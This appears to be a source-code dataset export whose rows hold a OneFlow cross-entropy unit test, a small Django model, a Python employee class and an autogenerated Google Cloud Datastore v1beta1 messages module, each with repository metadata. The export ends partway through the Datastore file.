np_logits, device=device_type, dtype=data_type, requires_grad=True
)
flow.comm.broadcast(of_logits, 0)
of_logits = of_logits.to_consistent(
placement=placement, sbp=[flow.sbp.broadcast, flow.sbp.broadcast]
)
of_logits = of_logits.to_consistent(
placement=placement, sbp=[flow.sbp.split(0), flow.sbp.split(1)]
)
of_labels = flow.tensor(np_labels, device=device_type, dtype=label_type)
flow.comm.broadcast(of_labels, 0)
of_labels = of_labels.to_consistent(
placement=placement, sbp=[flow.sbp.broadcast, flow.sbp.broadcast]
)
of_labels = of_labels.to_consistent(
placement=placement, sbp=[flow.sbp.split(0), flow.sbp.broadcast]
)
of_output = flow.nn.functional.sparse_softmax_cross_entropy(
labels=of_labels, logits=of_logits
).to(device_type)
of_output.sum().backward()
of_logits_grad = of_logits.grad.to_consistent(
placement=placement, sbp=[flow.sbp.broadcast, flow.sbp.broadcast]
)
of_logits_grad = of_logits_grad.to_local()
of_output = of_output.to_consistent(
placement=placement, sbp=[flow.sbp.broadcast, flow.sbp.broadcast]
)
of_output = of_output.to_local()
if rank == 0:
assert np.allclose(
of_output.numpy(), torch_output.detach().numpy(), rtol=1e-03, atol=1e-04
)
assert np.allclose(
of_logits_grad.numpy(), torch_logits.grad, rtol=1e-03, atol=1e-04
)
def compare_lazy_consistent_with_torch(
device_type, data_type, label_type, batch_size, num_classes,
):
data_type = type_name_to_flow_type[data_type]
label_type = type_name_to_flow_type[label_type]
np_labels = np.random.randint(0, num_classes, size=(batch_size,)).astype(np.int32)
np_logits = np.random.random((batch_size, num_classes)).astype(np.float32)
placement = flow.placement(device_type, {0: range(4)})
rank = flow.env.get_rank()
if rank == 0:
torch_logits = torch.tensor(np_logits, dtype=torch.float32, requires_grad=True)
torch_labels = torch.tensor(np_labels, dtype=torch.int64)
torch_output = torch.nn.functional.cross_entropy(
torch_logits, torch_labels, reduction="none"
)
torch_output.sum().backward()
class MyModule(flow.nn.Graph):
def __init__(self):
super(MyModule, self).__init__()
def build(self, logits, labels):
output = flow.nn.functional.sparse_softmax_cross_entropy(
labels=labels, logits=logits
)
# nn.graph no support get input.grad
# output.sum().backward()
return output
of_logits = flow.tensor(
np_logits, device=device_type, dtype=data_type, requires_grad=True
)
flow.comm.broadcast(of_logits, 0)
of_logits = of_logits.to_consistent(placement=placement, sbp=[flow.sbp.broadcast])
of_logits = of_logits.to_consistent(placement=placement, sbp=[flow.sbp.split(1)])
of_labels = flow.tensor(np_labels, device=device_type, dtype=label_type)
flow.comm.broadcast(of_labels, 0)
of_labels = of_labels.to_consistent(placement=placement, sbp=[flow.sbp.broadcast])
graph = MyModule()
of_output = graph(of_logits, of_labels)
of_output = of_output.to_consistent(placement=placement, sbp=[flow.sbp.broadcast])
of_output = of_output.to_local()
flow._oneflow_internal.eager.multi_client.Sync()
if rank == 0:
assert np.allclose(
of_output.numpy(), torch_output.detach().numpy(), rtol=1e-03, atol=1e-04
)
class TestSparseSoftmaxCrossEntropyWithLogits(flow.unittest.TestCase):
@flow.unittest.skip_unless_1n1d()
def test_sparse_softmax_cross_entropy(test_case):
arg_dict = OrderedDict()
arg_dict["device_type"] = ["cuda", "cpu"]
arg_dict["data_type"] = ["float32", "double"]
arg_dict["label_type"] = ["int32", "int64"]
arg_dict["batch_size"] = [64, 16]
arg_dict["num_classes"] = [100, 1000]
for arg in GenArgList(arg_dict):
compare_with_torch(*arg)
class TestSparseSoftmaxCrossEntropyMsWithLogits(flow.unittest.TestCase):
@unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
@flow.unittest.skip_unless_1n4d()
def test_distributed_sparse_softmax_cross_entropy(test_case):
arg_dict = OrderedDict()
arg_dict["device_type"] = ["cuda"]
arg_dict["data_type"] = ["float32", "double"]
arg_dict["label_type"] = ["int32", "int64"]
arg_dict["batch_size"] = [64]
arg_dict["num_classes"] = [1000]
for arg in GenArgList(arg_dict):
# compare_eager_consistent_with_torch(*arg)
compare_eager_2d_consistent_with_torch(*arg)
compare_lazy_consistent_with_torch(*arg)
if __name__ == "__main__":
unittest.main()
| 38.952381 | 87 | 0.699776 | 1,356 | 9,816 | 4.777286 | 0.130531 | 0.041988 | 0.039518 | 0.069466 | 0.804106 | 0.791448 | 0.786045 | 0.786045 | 0.774931 | 0.766749 | 0 | 0.018539 | 0.186736 | 9,816 | 251 | 88 | 39.10757 | 0.792935 | 0.071007 | 0 | 0.651515 | 0 | 0 | 0.024926 | 0.002306 | 0 | 0 | 0 | 0 | 0.035354 | 1 | 0.040404 | false | 0 | 0.040404 | 0 | 0.10101 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fc68ee80c9e11bc4b74757df1e6390db9f04a4bc | 235 | py | Python | presentation/models.py | axell-brendow/fullcycle03-challenge4 | 111ee240781b4213f5e7ebace26f067bbe3d13f8 | [
"MIT"
] | 1 | 2020-07-03T12:22:49.000Z | 2020-07-03T12:22:49.000Z | presentation/models.py | axell-brendow/fullcycle03-challenge4 | 111ee240781b4213f5e7ebace26f067bbe3d13f8 | [
"MIT"
] | 2 | 2021-03-30T14:00:29.000Z | 2021-04-08T21:19:47.000Z | presentation/models.py | axell-brendow/fullcycle03-challenge4 | 111ee240781b4213f5e7ebace26f067bbe3d13f8 | [
"MIT"
] | null | null | null | from django.db import models
class Class(models.Model):
name = models.CharField(max_length=255)
link = models.CharField(max_length=500)
def __str__(self):
return f'{{ name: "{self.name}", link: "{self.link}" }}'
| 23.5 | 64 | 0.655319 | 32 | 235 | 4.625 | 0.59375 | 0.202703 | 0.243243 | 0.324324 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031414 | 0.187234 | 235 | 9 | 65 | 26.111111 | 0.743456 | 0 | 0 | 0 | 0 | 0 | 0.195745 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0.166667 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
5d974c3f1b79613716106e07896431719d622c39 | 243 | py | Python | Fundamentos/polimorfismo/empleado.py | ijchavez/python | bccd94a9bee90125e2be27b0355bdaedb0ae9d19 | [
"Unlicense"
] | null | null | null | Fundamentos/polimorfismo/empleado.py | ijchavez/python | bccd94a9bee90125e2be27b0355bdaedb0ae9d19 | [
"Unlicense"
] | null | null | null | Fundamentos/polimorfismo/empleado.py | ijchavez/python | bccd94a9bee90125e2be27b0355bdaedb0ae9d19 | [
"Unlicense"
] | null | null | null | class Empleado:
def __init__(self, nombre, sueldo):
self.nombre = nombre
self.sueldo = sueldo
def __str__(self):
cadena = "Nombre: " + self.nombre + ", Sueldo: " + str(self.sueldo)
return cadena | 30.375 | 75 | 0.572016 | 26 | 243 | 5.038462 | 0.384615 | 0.229008 | 0.244275 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.312757 | 243 | 8 | 76 | 30.375 | 0.784431 | 0 | 0 | 0 | 0 | 0 | 0.07377 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
5ddfdce1d85382017935635582ae2d27570169b6 | 30,940 | py | Python | lib/googlecloudsdk/third_party/apis/datastore/v1beta1/datastore_v1beta1_messages.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | null | null | null | lib/googlecloudsdk/third_party/apis/datastore/v1beta1/datastore_v1beta1_messages.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | 11 | 2020-02-29T02:51:12.000Z | 2022-03-30T23:20:08.000Z | lib/googlecloudsdk/third_party/apis/datastore/v1beta1/datastore_v1beta1_messages.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | 1 | 2020-07-24T18:47:35.000Z | 2020-07-24T18:47:35.000Z | """Generated message classes for datastore version v1beta1.
Accesses the schemaless NoSQL database to provide fully managed, robust,
scalable storage for your application.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.protorpclite import messages as _messages
from apitools.base.py import encoding
from apitools.base.py import extra_types
package = 'datastore'
class DatastoreProjectsExportRequest(_messages.Message):
r"""A DatastoreProjectsExportRequest object.
Fields:
googleDatastoreAdminV1beta1ExportEntitiesRequest: A
GoogleDatastoreAdminV1beta1ExportEntitiesRequest resource to be passed
as the request body.
projectId: Project ID against which to make the request.
"""
googleDatastoreAdminV1beta1ExportEntitiesRequest = _messages.MessageField('GoogleDatastoreAdminV1beta1ExportEntitiesRequest', 1)
projectId = _messages.StringField(2, required=True)
class DatastoreProjectsImportRequest(_messages.Message):
r"""A DatastoreProjectsImportRequest object.
Fields:
googleDatastoreAdminV1beta1ImportEntitiesRequest: A
GoogleDatastoreAdminV1beta1ImportEntitiesRequest resource to be passed
as the request body.
projectId: Project ID against which to make the request.
"""
googleDatastoreAdminV1beta1ImportEntitiesRequest = _messages.MessageField('GoogleDatastoreAdminV1beta1ImportEntitiesRequest', 1)
projectId = _messages.StringField(2, required=True)
class GoogleDatastoreAdminV1CommonMetadata(_messages.Message):
r"""Metadata common to all Datastore Admin operations.
Enums:
OperationTypeValueValuesEnum: The type of the operation. Can be used as a
filter in ListOperationsRequest.
StateValueValuesEnum: The current state of the Operation.
Messages:
LabelsValue: The client-assigned labels which were provided when the
operation was created. May also include additional labels.
Fields:
endTime: The time the operation ended, either successfully or otherwise.
labels: The client-assigned labels which were provided when the operation
was created. May also include additional labels.
operationType: The type of the operation. Can be used as a filter in
ListOperationsRequest.
startTime: The time that work began on the operation.
state: The current state of the Operation.
"""
class OperationTypeValueValuesEnum(_messages.Enum):
r"""The type of the operation. Can be used as a filter in
ListOperationsRequest.
Values:
OPERATION_TYPE_UNSPECIFIED: Unspecified.
EXPORT_ENTITIES: ExportEntities.
IMPORT_ENTITIES: ImportEntities.
CREATE_INDEX: CreateIndex.
DELETE_INDEX: DeleteIndex.
"""
OPERATION_TYPE_UNSPECIFIED = 0
EXPORT_ENTITIES = 1
IMPORT_ENTITIES = 2
CREATE_INDEX = 3
DELETE_INDEX = 4
class StateValueValuesEnum(_messages.Enum):
r"""The current state of the Operation.
Values:
STATE_UNSPECIFIED: Unspecified.
INITIALIZING: Request is being prepared for processing.
PROCESSING: Request is actively being processed.
CANCELLING: Request is in the process of being cancelled after user
called google.longrunning.Operations.CancelOperation on the operation.
FINALIZING: Request has been processed and is in its finalization stage.
SUCCESSFUL: Request has completed successfully.
FAILED: Request has finished being processed, but encountered an error.
CANCELLED: Request has finished being cancelled after user called
google.longrunning.Operations.CancelOperation.
"""
STATE_UNSPECIFIED = 0
INITIALIZING = 1
PROCESSING = 2
CANCELLING = 3
FINALIZING = 4
SUCCESSFUL = 5
FAILED = 6
CANCELLED = 7
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""The client-assigned labels which were provided when the operation was
created. May also include additional labels.
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
endTime = _messages.StringField(1)
labels = _messages.MessageField('LabelsValue', 2)
operationType = _messages.EnumField('OperationTypeValueValuesEnum', 3)
startTime = _messages.StringField(4)
state = _messages.EnumField('StateValueValuesEnum', 5)
class GoogleDatastoreAdminV1EntityFilter(_messages.Message):
r"""Identifies a subset of entities in a project. This is specified as
combinations of kinds and namespaces (either or both of which may be all, as
described in the following examples). Example usage: Entire project:
kinds=[], namespace_ids=[] Kinds Foo and Bar in all namespaces:
kinds=['Foo', 'Bar'], namespace_ids=[] Kinds Foo and Bar only in the
default namespace: kinds=['Foo', 'Bar'], namespace_ids=[''] Kinds Foo and
Bar in both the default and Baz namespaces: kinds=['Foo', 'Bar'],
namespace_ids=['', 'Baz'] The entire Baz namespace: kinds=[],
namespace_ids=['Baz']
Fields:
kinds: If empty, then this represents all kinds.
namespaceIds: An empty list represents all namespaces. This is the
preferred usage for projects that don't use namespaces. An empty string
element represents the default namespace. This should be used if the
project has data in non-default namespaces, but doesn't want to include
them. Each namespace in this list must be unique.
"""
kinds = _messages.StringField(1, repeated=True)
namespaceIds = _messages.StringField(2, repeated=True)
class GoogleDatastoreAdminV1ExportEntitiesMetadata(_messages.Message):
r"""Metadata for ExportEntities operations.
Fields:
common: Metadata common to all Datastore Admin operations.
entityFilter: Description of which entities are being exported.
outputUrlPrefix: Location for the export metadata and data files. This
will be the same value as the
google.datastore.admin.v1.ExportEntitiesRequest.output_url_prefix field.
The final output location is provided in
google.datastore.admin.v1.ExportEntitiesResponse.output_url.
progressBytes: An estimate of the number of bytes processed.
progressEntities: An estimate of the number of entities processed.
"""
common = _messages.MessageField('GoogleDatastoreAdminV1CommonMetadata', 1)
entityFilter = _messages.MessageField('GoogleDatastoreAdminV1EntityFilter', 2)
outputUrlPrefix = _messages.StringField(3)
progressBytes = _messages.MessageField('GoogleDatastoreAdminV1Progress', 4)
progressEntities = _messages.MessageField('GoogleDatastoreAdminV1Progress', 5)
class GoogleDatastoreAdminV1ExportEntitiesResponse(_messages.Message):
r"""The response for
google.datastore.admin.v1.DatastoreAdmin.ExportEntities.
Fields:
outputUrl: Location of the output metadata file. This can be used to begin
an import into Cloud Datastore (this project or another project). See
google.datastore.admin.v1.ImportEntitiesRequest.input_url. Only present
if the operation completed successfully.
"""
outputUrl = _messages.StringField(1)
class GoogleDatastoreAdminV1ImportEntitiesMetadata(_messages.Message):
r"""Metadata for ImportEntities operations.
Fields:
common: Metadata common to all Datastore Admin operations.
entityFilter: Description of which entities are being imported.
inputUrl: The location of the import metadata file. This will be the same
value as the google.datastore.admin.v1.ExportEntitiesResponse.output_url
field.
progressBytes: An estimate of the number of bytes processed.
progressEntities: An estimate of the number of entities processed.
"""
common = _messages.MessageField('GoogleDatastoreAdminV1CommonMetadata', 1)
entityFilter = _messages.MessageField('GoogleDatastoreAdminV1EntityFilter', 2)
inputUrl = _messages.StringField(3)
progressBytes = _messages.MessageField('GoogleDatastoreAdminV1Progress', 4)
progressEntities = _messages.MessageField('GoogleDatastoreAdminV1Progress', 5)
class GoogleDatastoreAdminV1IndexOperationMetadata(_messages.Message):
r"""Metadata for Index operations.
Fields:
common: Metadata common to all Datastore Admin operations.
indexId: The index resource ID that this operation is acting on.
progressEntities: An estimate of the number of entities processed.
"""
common = _messages.MessageField('GoogleDatastoreAdminV1CommonMetadata', 1)
indexId = _messages.StringField(2)
progressEntities = _messages.MessageField('GoogleDatastoreAdminV1Progress', 3)
class GoogleDatastoreAdminV1Progress(_messages.Message):
r"""Measures the progress of a particular metric.
Fields:
workCompleted: The amount of work that has been completed. Note that this
may be greater than work_estimated.
workEstimated: An estimate of how much work needs to be performed. May be
zero if the work estimate is unavailable.
"""
workCompleted = _messages.IntegerField(1)
workEstimated = _messages.IntegerField(2)
class GoogleDatastoreAdminV1beta1CommonMetadata(_messages.Message):
r"""Metadata common to all Datastore Admin operations.
Enums:
OperationTypeValueValuesEnum: The type of the operation. Can be used as a
filter in ListOperationsRequest.
StateValueValuesEnum: The current state of the Operation.
Messages:
LabelsValue: The client-assigned labels which were provided when the
operation was created. May also include additional labels.
Fields:
endTime: The time the operation ended, either successfully or otherwise.
labels: The client-assigned labels which were provided when the operation
was created. May also include additional labels.
operationType: The type of the operation. Can be used as a filter in
ListOperationsRequest.
startTime: The time that work began on the operation.
state: The current state of the Operation.
"""
class OperationTypeValueValuesEnum(_messages.Enum):
r"""The type of the operation. Can be used as a filter in
ListOperationsRequest.
Values:
OPERATION_TYPE_UNSPECIFIED: Unspecified.
EXPORT_ENTITIES: ExportEntities.
IMPORT_ENTITIES: ImportEntities.
"""
OPERATION_TYPE_UNSPECIFIED = 0
EXPORT_ENTITIES = 1
IMPORT_ENTITIES = 2
class StateValueValuesEnum(_messages.Enum):
r"""The current state of the Operation.
Values:
STATE_UNSPECIFIED: Unspecified.
INITIALIZING: Request is being prepared for processing.
PROCESSING: Request is actively being processed.
CANCELLING: Request is in the process of being cancelled after user
called google.longrunning.Operations.CancelOperation on the operation.
FINALIZING: Request has been processed and is in its finalization stage.
SUCCESSFUL: Request has completed successfully.
FAILED: Request has finished being processed, but encountered an error.
CANCELLED: Request has finished being cancelled after user called
google.longrunning.Operations.CancelOperation.
"""
STATE_UNSPECIFIED = 0
INITIALIZING = 1
PROCESSING = 2
CANCELLING = 3
FINALIZING = 4
SUCCESSFUL = 5
FAILED = 6
CANCELLED = 7
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""The client-assigned labels which were provided when the operation was
created. May also include additional labels.
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
endTime = _messages.StringField(1)
labels = _messages.MessageField('LabelsValue', 2)
operationType = _messages.EnumField('OperationTypeValueValuesEnum', 3)
startTime = _messages.StringField(4)
state = _messages.EnumField('StateValueValuesEnum', 5)
class GoogleDatastoreAdminV1beta1EntityFilter(_messages.Message):
r"""Identifies a subset of entities in a project. This is specified as
combinations of kinds and namespaces (either or both of which may be all, as
described in the following examples). Example usage: Entire project:
kinds=[], namespace_ids=[] Kinds Foo and Bar in all namespaces:
kinds=['Foo', 'Bar'], namespace_ids=[] Kinds Foo and Bar only in the
default namespace: kinds=['Foo', 'Bar'], namespace_ids=[''] Kinds Foo and
Bar in both the default and Baz namespaces: kinds=['Foo', 'Bar'],
namespace_ids=['', 'Baz'] The entire Baz namespace: kinds=[],
namespace_ids=['Baz']
Fields:
kinds: If empty, then this represents all kinds.
namespaceIds: An empty list represents all namespaces. This is the
preferred usage for projects that don't use namespaces. An empty string
element represents the default namespace. This should be used if the
project has data in non-default namespaces, but doesn't want to include
them. Each namespace in this list must be unique.
"""
kinds = _messages.StringField(1, repeated=True)
namespaceIds = _messages.StringField(2, repeated=True)
class GoogleDatastoreAdminV1beta1ExportEntitiesMetadata(_messages.Message):
r"""Metadata for ExportEntities operations.
Fields:
common: Metadata common to all Datastore Admin operations.
entityFilter: Description of which entities are being exported.
outputUrlPrefix: Location for the export metadata and data files. This
will be the same value as the
google.datastore.admin.v1beta1.ExportEntitiesRequest.output_url_prefix
field. The final output location is provided in
google.datastore.admin.v1beta1.ExportEntitiesResponse.output_url.
progressBytes: An estimate of the number of bytes processed.
progressEntities: An estimate of the number of entities processed.
"""
common = _messages.MessageField('GoogleDatastoreAdminV1beta1CommonMetadata', 1)
entityFilter = _messages.MessageField('GoogleDatastoreAdminV1beta1EntityFilter', 2)
outputUrlPrefix = _messages.StringField(3)
progressBytes = _messages.MessageField('GoogleDatastoreAdminV1beta1Progress', 4)
progressEntities = _messages.MessageField('GoogleDatastoreAdminV1beta1Progress', 5)
class GoogleDatastoreAdminV1beta1ExportEntitiesRequest(_messages.Message):
r"""The request for
google.datastore.admin.v1beta1.DatastoreAdmin.ExportEntities.
Messages:
LabelsValue: Client-assigned labels.
Fields:
entityFilter: Description of what data from the project is included in the
export.
labels: Client-assigned labels.
outputUrlPrefix: Location for the export metadata and data files. The
full resource URL of the external storage location. Currently, only
Google Cloud Storage is supported. So output_url_prefix should be of the
form: `gs://BUCKET_NAME[/NAMESPACE_PATH]`, where `BUCKET_NAME` is the
name of the Cloud Storage bucket and `NAMESPACE_PATH` is an optional
Cloud Storage namespace path (this is not a Cloud Datastore namespace).
For more information about Cloud Storage namespace paths, see [Object
name considerations](https://cloud.google.com/storage/docs/naming
#object-considerations). The resulting files will be nested deeper than
the specified URL prefix. The final output URL will be provided in the
google.datastore.admin.v1beta1.ExportEntitiesResponse.output_url field.
That value should be used for subsequent ImportEntities operations. By
nesting the data files deeper, the same Cloud Storage bucket can be used
in multiple ExportEntities operations without conflict.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""Client-assigned labels.
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
entityFilter = _messages.MessageField('GoogleDatastoreAdminV1beta1EntityFilter', 1)
labels = _messages.MessageField('LabelsValue', 2)
outputUrlPrefix = _messages.StringField(3)
class GoogleDatastoreAdminV1beta1ExportEntitiesResponse(_messages.Message):
r"""The response for
google.datastore.admin.v1beta1.DatastoreAdmin.ExportEntities.
Fields:
outputUrl: Location of the output metadata file. This can be used to begin
an import into Cloud Datastore (this project or another project). See
google.datastore.admin.v1beta1.ImportEntitiesRequest.input_url. Only
present if the operation completed successfully.
"""
outputUrl = _messages.StringField(1)
class GoogleDatastoreAdminV1beta1ImportEntitiesMetadata(_messages.Message):
r"""Metadata for ImportEntities operations.
Fields:
common: Metadata common to all Datastore Admin operations.
entityFilter: Description of which entities are being imported.
inputUrl: The location of the import metadata file. This will be the same
value as the
google.datastore.admin.v1beta1.ExportEntitiesResponse.output_url field.
progressBytes: An estimate of the number of bytes processed.
progressEntities: An estimate of the number of entities processed.
"""
common = _messages.MessageField('GoogleDatastoreAdminV1beta1CommonMetadata', 1)
entityFilter = _messages.MessageField('GoogleDatastoreAdminV1beta1EntityFilter', 2)
inputUrl = _messages.StringField(3)
progressBytes = _messages.MessageField('GoogleDatastoreAdminV1beta1Progress', 4)
progressEntities = _messages.MessageField('GoogleDatastoreAdminV1beta1Progress', 5)
class GoogleDatastoreAdminV1beta1ImportEntitiesRequest(_messages.Message):
r"""The request for
google.datastore.admin.v1beta1.DatastoreAdmin.ImportEntities.
Messages:
LabelsValue: Client-assigned labels.
Fields:
entityFilter: Optionally specify which kinds/namespaces are to be
imported. If provided, the list must be a subset of the EntityFilter
used in creating the export, otherwise a FAILED_PRECONDITION error will
be returned. If no filter is specified then all entities from the export
are imported.
inputUrl: The full resource URL of the external storage location.
Currently, only Google Cloud Storage is supported. So input_url should
be of the form:
`gs://BUCKET_NAME[/NAMESPACE_PATH]/OVERALL_EXPORT_METADATA_FILE`, where
`BUCKET_NAME` is the name of the Cloud Storage bucket, `NAMESPACE_PATH`
is an optional Cloud Storage namespace path (this is not a Cloud
Datastore namespace), and `OVERALL_EXPORT_METADATA_FILE` is the metadata
file written by the ExportEntities operation. For more information about
Cloud Storage namespace paths, see [Object name
considerations](https://cloud.google.com/storage/docs/naming#object-
considerations). For more information, see
google.datastore.admin.v1beta1.ExportEntitiesResponse.output_url.
labels: Client-assigned labels.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""Client-assigned labels.
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
entityFilter = _messages.MessageField('GoogleDatastoreAdminV1beta1EntityFilter', 1)
inputUrl = _messages.StringField(2)
labels = _messages.MessageField('LabelsValue', 3)
class GoogleDatastoreAdminV1beta1Progress(_messages.Message):
r"""Measures the progress of a particular metric.
Fields:
workCompleted: The amount of work that has been completed. Note that this
may be greater than work_estimated.
workEstimated: An estimate of how much work needs to be performed. May be
zero if the work estimate is unavailable.
"""
workCompleted = _messages.IntegerField(1)
workEstimated = _messages.IntegerField(2)
class GoogleLongrunningOperation(_messages.Message):
r"""This resource represents a long-running operation that is the result of
a network API call.
Messages:
MetadataValue: Service-specific metadata associated with the operation.
It typically contains progress information and common metadata such as
create time. Some services might not provide such metadata. Any method
that returns a long-running operation should document the metadata type,
if any.
ResponseValue: The normal response of the operation in case of success.
If the original method returns no data on success, such as `Delete`, the
response is `google.protobuf.Empty`. If the original method is standard
`Get`/`Create`/`Update`, the response should be the resource. For other
methods, the response should have the type `XxxResponse`, where `Xxx` is
the original method name. For example, if the original method name is
`TakeSnapshot()`, the inferred response type is `TakeSnapshotResponse`.
Fields:
done: If the value is `false`, it means the operation is still in
progress. If `true`, the operation is completed, and either `error` or
`response` is available.
error: The error result of the operation in case of failure or
cancellation.
metadata: Service-specific metadata associated with the operation. It
typically contains progress information and common metadata such as
create time. Some services might not provide such metadata. Any method
that returns a long-running operation should document the metadata type,
if any.
name: The server-assigned name, which is only unique within the same
service that originally returns it. If you use the default HTTP mapping,
the `name` should be a resource name ending with
`operations/{unique_id}`.
response: The normal response of the operation in case of success. If the
original method returns no data on success, such as `Delete`, the
response is `google.protobuf.Empty`. If the original method is standard
`Get`/`Create`/`Update`, the response should be the resource. For other
methods, the response should have the type `XxxResponse`, where `Xxx` is
the original method name. For example, if the original method name is
`TakeSnapshot()`, the inferred response type is `TakeSnapshotResponse`.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class MetadataValue(_messages.Message):
r"""Service-specific metadata associated with the operation. It typically
contains progress information and common metadata such as create time.
Some services might not provide such metadata. Any method that returns a
long-running operation should document the metadata type, if any.
Messages:
AdditionalProperty: An additional property for a MetadataValue object.
Fields:
additionalProperties: Properties of the object. Contains field @type
with type URL.
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a MetadataValue object.
Fields:
key: Name of the additional property.
value: A extra_types.JsonValue attribute.
"""
key = _messages.StringField(1)
value = _messages.MessageField('extra_types.JsonValue', 2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
@encoding.MapUnrecognizedFields('additionalProperties')
class ResponseValue(_messages.Message):
r"""The normal response of the operation in case of success. If the
original method returns no data on success, such as `Delete`, the response
is `google.protobuf.Empty`. If the original method is standard
`Get`/`Create`/`Update`, the response should be the resource. For other
methods, the response should have the type `XxxResponse`, where `Xxx` is
the original method name. For example, if the original method name is
`TakeSnapshot()`, the inferred response type is `TakeSnapshotResponse`.
Messages:
AdditionalProperty: An additional property for a ResponseValue object.
Fields:
additionalProperties: Properties of the object. Contains field @type
with type URL.
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a ResponseValue object.
Fields:
key: Name of the additional property.
value: A extra_types.JsonValue attribute.
"""
key = _messages.StringField(1)
value = _messages.MessageField('extra_types.JsonValue', 2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
done = _messages.BooleanField(1)
error = _messages.MessageField('Status', 2)
metadata = _messages.MessageField('MetadataValue', 3)
name = _messages.StringField(4)
response = _messages.MessageField('ResponseValue', 5)
class StandardQueryParameters(_messages.Message):
r"""Query parameters accepted by all methods.
Enums:
FXgafvValueValuesEnum: V1 error format.
AltValueValuesEnum: Data format for response.
Fields:
f__xgafv: V1 error format.
access_token: OAuth access token.
alt: Data format for response.
callback: JSONP
fields: Selector specifying which fields to include in a partial response.
key: API key. Your API key identifies your project and provides you with
API access, quota, and reports. Required unless you provide an OAuth 2.0
token.
oauth_token: OAuth 2.0 token for the current user.
prettyPrint: Returns response with indentations and line breaks.
quotaUser: Available to use for quota purposes for server-side
applications. Can be any arbitrary string assigned to a user, but should
not exceed 40 characters.
trace: A tracing token of the form "token:<tokenid>" to include in api
requests.
uploadType: Legacy upload protocol for media (e.g. "media", "multipart").
upload_protocol: Upload protocol for media (e.g. "raw", "multipart").
"""
class AltValueValuesEnum(_messages.Enum):
r"""Data format for response.
Values:
json: Responses with Content-Type of application/json
media: Media download with context-dependent Content-Type
proto: Responses with Content-Type of application/x-protobuf
"""
json = 0
media = 1
proto = 2
class FXgafvValueValuesEnum(_messages.Enum):
r"""V1 error format.
Values:
_1: v1 error format
_2: v2 error format
"""
_1 = 0
_2 = 1
f__xgafv = _messages.EnumField('FXgafvValueValuesEnum', 1)
access_token = _messages.StringField(2)
alt = _messages.EnumField('AltValueValuesEnum', 3, default=u'json')
callback = _messages.StringField(4)
fields = _messages.StringField(5)
key = _messages.StringField(6)
oauth_token = _messages.StringField(7)
prettyPrint = _messages.BooleanField(8, default=True)
quotaUser = _messages.StringField(9)
trace = _messages.StringField(10)
uploadType = _messages.StringField(11)
upload_protocol = _messages.StringField(12)
class Status(_messages.Message):
r"""The `Status` type defines a logical error model that is suitable for
different programming environments, including REST APIs and RPC APIs. It is
used by [gRPC](https://github.com/grpc). Each `Status` message contains
three pieces of data: error code, error message, and error details. You can
